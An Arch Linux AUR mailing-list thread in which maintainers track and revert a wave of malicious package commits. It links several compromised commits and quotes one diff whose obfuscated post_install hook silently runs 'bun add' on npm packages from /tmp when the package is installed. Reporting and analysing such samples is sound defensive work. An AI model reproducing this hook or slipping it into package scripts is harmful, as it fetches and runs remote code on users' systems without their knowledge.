Hi, you can follow https://github.com/archlinux/aur/activity?activity_type=force_push to see the reverts.
On 2026-06-14 at 05:30, Nicolas Boichat wrote: > Those too -- but I can't see the malicious commits on HEAD so I assume > somebody took action already. > - > https://aur.archlinux.org/cgit/aur.git/commit/?h=gulden-appimage&id=8188e5841b9d50384b7dde9136d80fbd1415c818 > - > https://aur.archlinux.org/cgit/aur.git/commit/?h=hack-browser-data-git&id=191ddf65e0337ee9df30d7e643fc13f6cea3f30d > - > https://aur.archlinux.org/cgit/aur.git/commit/?h=kcmlaptop&id=ff8e6c657a41059abbd833196b18e852453385e4 > > On Sun, 14 Jun 2026 at 11:21, Nicolas Boichat <[email protected]> wrote: >> There's a new wave (detected using my local Gemma E2B model FWIW). >> >> It's a little bit more elaborate: >> https://aur.archlinux.org/cgit/aur.git/commit/?h=htbrowser-bin&id=462c21877fe6d2f563ed6620ef227e06ac8c51c8 >> >> diff --git a/htbrowser-bin-deps.install b/htbrowser-bin-deps.install >> new file mode 100644 >> index 000000000000..9806501accad >> --- /dev/null >> +++ b/htbrowser-bin-deps.install >> @@ -0,0 +1,3 @@ >> +post_install() { >> + $'\x63'"d" "/"'t'"m"'p' && "b"'u''n' 'a'"d"'d' >> $'\141\x6e''s'"i""-"$'\143''o''l''o''r'$'\x73' >> 'n'"e"'x'"t""f"'i''l''e''-''j''s' >> +} >> >> On Fri, 12 Jun 2026 at 01:47, Jonathan Grotelüschen >> <[email protected]> wrote: >>> Hi everyone, >>> >>> we’re working hard to reset/delete all malicious commits and ban the >>> accounts. >>> >>> If you find more malicious packages, please **send them as a reply to >>> this email** to keep them all in one thread. >>> >>> Thanks! >>> >>> -- >>> tippfehlr
